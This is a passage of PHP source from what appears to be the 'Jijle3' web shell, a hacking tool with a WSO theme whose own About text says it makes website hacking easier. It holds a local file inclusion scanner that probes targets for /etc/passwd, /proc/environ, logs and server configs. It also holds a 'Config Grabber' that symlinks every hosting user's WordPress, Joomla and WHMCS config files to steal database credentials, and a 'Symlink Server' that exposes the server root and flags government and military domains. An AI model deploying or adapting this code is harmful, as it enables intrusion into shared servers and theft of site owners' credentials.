657 </form>';
658 error_reporting(0);
659 if($_POST['lfiurl']) {
660 print "<pre>";
661 $cheader = $_POST['custom_header'];
662 $target = $_POST['lfiurl'];
663 $type = $_POST['scantype'];
664 $byte1 = $_POST['null'];
665 $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
666 $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
667 $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
668 $lfiaccess = array(
669 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
670 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
671 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
672 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
673 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
674 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
675 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
676 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
677 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
678 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
679 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
680 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
681 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
682 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
683 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
684 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
685 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
686 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
687 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
688 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
689 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
690 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
691 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
692
693 $lfierror = array(
694 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
695 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
696 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
697 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
698 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
699 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
700 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
701 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
702 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
703 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
704 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
705 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
706 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
707 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
708 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
709 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
710 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
711 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
712 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
713 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
714 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
715 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
716 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
717
718 $lficonfig = array(
719 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
720 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
721 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
722 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
723 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
724 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
725 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
726 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
727 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
728 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
729 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
730 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
731 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
732 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
733 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
734 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
735 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
736 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
737 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
738 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
739 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
740 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
741 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
742 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
743 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
744 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
745 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
746 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
747 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
748 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
749 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
750 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
751 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
752 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
753 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
754
755 $lfiphpini = array(
756 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
757 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
758 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
759 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
760 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
761 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
762 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
763 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
764 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
765 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
766 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
767 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
768 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
769 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
770 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
771 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
772 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
773 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
774 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
775 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
776 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
777 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
778 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
779 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
780 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
781 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
782 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
783
784 $lfimysql = array(
785 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
786 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
787 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
788 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
789 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
790 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
791 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
792 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
793 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
794 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
795
796 $lfiftp = array(
797 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
798 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
799 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
800 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
801 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
802 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
803 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
804 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
805 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
806 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
807 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
808 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
809 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
810 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
811 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
812 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
813 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
814 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
815 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
816 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
817 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
818 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
819 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
820 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
821 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
822 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
823 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
824 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
825 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
826 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
827 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
828 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
829 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
830 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
831 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
832 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
833 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
834 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
835 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
836 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
837 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
838 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
839 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
840 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
841
842
843 $x = 1;
844 if ( $type == 1 ) {
845 $res1 = FetchURL($target.$lfitest);
846 $res2 = FetchURL($target.$lfitest2);
847 $rhash1 = md5($res1);
848 $rhash2 = md5($res2);
849 if ($rhash1 != $rhash2) {
850 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
851 while($lfiaccess[$x]) {
852 $res3 = FetchURL($target.$lfiaccess[$x]);
853 $rhash3 = md5($res3);
854 if ($rhash3 != $rhash2) {
855 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
856 }
857 else {
858 print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
859 }
860 $x++;
861 }
862 }
863 }
864 if ( $type == 2 ) {
865 $res1 = FetchURL($target.$lfitest);
866 $res2 = FetchURL($target.$lfitest2);
867 $rhash1 = md5($res1);
868 $rhash2 = md5($res2);
869 if ($rhash1 != $rhash2) {
870 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
871 while($lficonfig[$x]) {
872 $res3 = FetchURL($target.$lficonfig[$x]);
873 $rhash3 = md5($res3);
874 if ($rhash3 != $rhash2) {
875 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
876 }
877 else {
878 print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
879 }
880 $x++;
881 }
882 }
883 }
884 if ( $type == 3 ) {
885 $res1 = FetchURL($target.$lfitest);
886 $res2 = FetchURL($target.$lfitest2);
887 $rhash1 = md5($res1);
888 $rhash2 = md5($res2);
889 if ($rhash1 != $rhash2) {
890 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
891 while($lfierror[$x]) {
892 $res3 = FetchURL($target.$lfierror[$x]);
893 $rhash3 = md5($res3);
894 if ($rhash3 != $rhash2) {
895 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
896 }
897 else {
898 print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
899 }
900 $x++;
901 }
902 }
903 }
904 if ( $type == 4 ) {
905 $res1 = FetchURL($target.$lfitest);
906 $res2 = FetchURL($target.$lfitest2);
907 $rhash1 = md5($res1);
908 $rhash2 = md5($res2);
909 if ($rhash1 != $rhash2) {
910 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
911 while($lfiphpini[$x]) {
912 $res3 = FetchURL($target.$lfiphpini[$x]);
913 $rhash3 = md5($res3);
914 if ($rhash3 != $rhash2) {
915 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
916 }
917 else {
918 print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
919 }
920 $x++;
921 }
922 }
923 }
924 if ( $type == 5 ) {
925 $res1 = FetchURL($target.$lfitest);
926 $res2 = FetchURL($target.$lfitest2);
927 $rhash1 = md5($res1);
928 $rhash2 = md5($res2);
929 if ($rhash1 != $rhash2) {
930 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
931 while($lfimysql[$x]) {
932 $res3 = FetchURL($target.$lfimysql[$x]);
933 $rhash3 = md5($res3);
934 if ($rhash3 != $rhash2) {
935 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
936 }
937 else {
938 print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
939 }
940 $x++;
941 }
942 }
943 }
944 if ( $type == 6 ) {
945 $res1 = FetchURL($target.$lfitest);
946 $res2 = FetchURL($target.$lfitest2);
947 $rhash1 = md5($res1);
948 $rhash2 = md5($res2);
949 if ($rhash1 != $rhash2) {
950 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
951 while($lfiftp[$x]) {
952 $res3 = FetchURL($target.$lfiftp[$x]);
953 $rhash3 = md5($res3);
954 if ($rhash3 != $rhash2) {
955 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
956 }
957 else {
958 print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
959 }
960 $x++;
961 }
962 }
963 }
964if ( $type == 7 ) {
965 $res1 = FetchURL($target.$lfitest);
966 $res2 = FetchURL($target.$lfitest2);
967 $rhash1 = md5($res1);
968 $rhash2 = md5($res2);
969 if ($rhash1 != $rhash2) {
970 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
971 $res3 = FetchURL($target.$lfiprocenv);
972 $rhash3 = md5($res3);
973 if ($rhash3 != $rhash2) {
974 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
975 }
976 else {
977 print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
978 }
979 }
980 }
981 }
982 }
983wsoFooter();
984}
985
986###################### Config Grabber ######################
987function actionconfig() {
988wsoHeader();
989
990echo "<center>
991<h1>Config Grabber</h1>
992";
993?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Tahoma" color="white" size="2pt">Put /etc/passwd</p><br><form method="POST"><textarea name="passwd" class='area' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd');
994?>
995</textarea><br><br><input name="config" class='inputzbut' size="100" value="Get The Configs !" type="submit"><br><input type="hidden" name="a" value="config"></form></center><br>
996<?php }if ($_POST['config']) {
997$function = $functions=@ini_get("disable_functions");
998if(eregi("symlink",$functions)){die ('<error>Symlink is disabled :( </error>');}@mkdir('phdz-config', 0755);@chdir('phdz-config');
999$htaccess="
1000OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
1001Options Indexes FollowSymLinks
1002ForceType text/plain
1003AddType text/plain .php
1004AddType text/plain .html
1005AddType text/html .shtml
1006AddType txt .php
1007AddHandler server-parsed .php
1008AddHandler txt .php
1009AddHandler txt .html
1010AddHandler txt .shtml
1011Options All
1012Options All";
1013file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];$passwd=explode("\n",$passwd);echo "<br><br><center><font>Bism Allah</center><br>";
1014foreach($passwd as $pwd){$pawd=explode(":",$pwd);$user =$pawd[0];@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');@symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');@symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');@symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');@symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');@symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');@symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');@symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');@symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');@symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');@symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');@symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');@symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');@symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');@symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');@symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');@symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');@symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');@symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');@symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');@symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');@symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');@symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');@symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
1015echo '<b class="cone"><font><b>Configs Link : </b> <a target="_blank" href="phdz-config">[ Configs ]</a></font></b>';}
1016wsoFooter();}
1017###################### About ############################
1018function actionabout() {
1019wsoHeader();
1020echo'
1021<center>
1022<h1>[ About ]</h1>
1023<br /><br />
1024</form>
1025';
1026?><head>
1027<span class="style1"><font size="3" color="#FFFFFF" face="Adobe Heiti Std R"></font> <div style='font-family: Courier New; font-size: 10px;'><font color='white' class=txt ><pre>
1028 _ _ _ _ _____ ____ _ _ ____
1029 | | (_) (_) | | ___ |___ / | _ \ | | | | | _ \
1030 _ | | | | | | | | / _ \ |_ \ | |_) | | |_| | | |_) |
1031| |_| | | | | | | | | __/ ___) | | __/ | _ | | __/
1032 \___/ |_| _/ | |_| \___| |____/ |_| |_| |_| |_|
1033 |__/
1034 ____ _ _ _
1035/ ___| | |__ ___ | | | |
1036\___ \ | '_ \ / _ \ | | | |
1037 ___) | | | | | | __/ | | | |
1038|____/ |_| |_| \___| |_| |_|
1039<span class="style1"><font size="9" color="#FFFFFF" face="Adobe Heiti Std R"></font><p>
1040<pre>
1041<iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FJ1jeI&width&height=62&colorscheme=light&show_faces=false&header=true&stream=false&show_border=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:62px;" allowTransparency="true"></iframe><pre>
1042<p><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1043Jijle3 PHP Web Shell Created To Make Web Site Hacking More Easy ..<br><br> And To Gev You Some Normal Tools ! With WSO Theme<br><br> iF You Want Me To Add A Notther Tools in Secend Virsion Mail Me in My E-mail Bellow Or in My Facebook Page !<br><br></font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1044<div style='font-family: Courier New; font-size: 10px;'><font size='2' class=txt ><pre>
1045Coded By Phenomene Dz <br>Algeria - Jijel<br>Finished in 2015/02/03<br>My Email - dzph@bk.ru -<br>Youtube Channel <a href="http://www.youtube.com/DZPH/" target="_blank">YouTube</a><br><br>All Right Reserved (C) Phenomene Dz - Martyrs Crew 2015
1046<font size="13" face="Adobe Heiti Std R" color="red"></font><font size="7" color="red" face="Adobe Heiti Std R"></font></span></p>
1047[ Thanks To ] <br><br>Abod Hack - Red Ck - Ghost1145 - Prodigy Tn - EL Moj4hid - Ghost dz - L'Apoca Dz - Mr Dz Gang <br><br> Sy3i4n K!lle3 - Red Hell Sofyan - Algeriano - Hero Dz - Cesc Dz - X Zone - K2ll33d - Almokawim <br><br> Martyrs Team - Algerian To The Core - 1337day Community Algeria - Fallaga Team <br><br> AnonGhost Team - Dz Team - Anonymous Dz - Backup Sec Dz <br><br> Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com - dz-root.com - is-sec.com <br><br> And All My Freinds - All Muslims Hackers - All Algerian Hackers <font><font size="9" face="Adobe Heiti Std R" color="#008000"></font><font size="7" color="#FFFFFF" face="Adobe Heiti Std R"></font></span></p>
1048<?
1049wsoFooter(); }
1050###################### Symlink Server ############################
1051function actionsymserver() {
1052wsoHeader();
1053echo'<center><h1>Symlink Server</h1><br>';
1054@set_time_limit(0);
1055echo "<center>";
1056
1057@mkdir('phdz-symserver',0777);
1058$htaccess = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1059$write =@fopen ('phdz-symserver/.htaccess','w');
1060fwrite($write ,$htaccess);
1061@symlink('/','phdz-symserver/root');
1062$filelocation = basename(__FILE__);
1063$read_named_conf = @file('/etc/named.conf');
1064if(!$read_named_conf)
1065{
1066echo "<pre class=ml1 style='margin-top:5px'>[ /etc/named.conf ] ==> Not Writeable !</pre></center>";
1067}
1068else
1069{
1070echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
1071foreach($read_named_conf as $subject){
1072if(eregi('zone',$subject)){
1073preg_match_all('#zone "(.*)"#',$subject,$string);
1074flush();
1075if(strlen(trim($string[1][0])) >2){
1076$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
1077$name = $UID['name'] ;
1078@symlink('/','sym/root');
1079$name = $string[1][0];
1080$iran = '\.ir';
1081$israel = '\.il';
1082$indo = '\.id';
1083$sg12 = '\.sg';
1084$edu = '\.edu';
1085$gov = '\.gov';
1086$gose = '\.go';
1087$gober = '\.gob';
1088$mil1 = '\.mil';
1089$mil2 = '\.mi';
1090if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
1091or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
1092{
1093$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
1094}
1095echo "
1096<tr>
1097
1098<td>
1099<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
1100</td>
1101
1102<td>
1103'.$UID['name']."
1104</td>
1105
1106<td>
